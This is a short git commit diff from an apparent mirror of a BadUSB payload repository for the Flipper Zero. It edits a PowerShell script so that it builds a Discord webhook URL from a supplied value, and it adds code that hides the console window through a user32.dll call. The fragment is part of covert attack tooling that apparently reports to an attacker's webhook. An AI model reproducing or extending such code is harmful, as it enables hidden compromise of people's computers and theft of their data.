mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-01 15:35:57 -08:00
Update main.ps1
This commit is contained in:
@@ -1,4 +1,7 @@
|
||||
$hookurl = "$dc" # YOUR_WEBHOOK_HERE
|
||||
$hookurl = "$dc"
|
||||
if ($hookurl.Length -lt 120){
|
||||
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
# Hide the console
|
||||
$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
|
||||
|
||||
Reference in New Issue
Block a user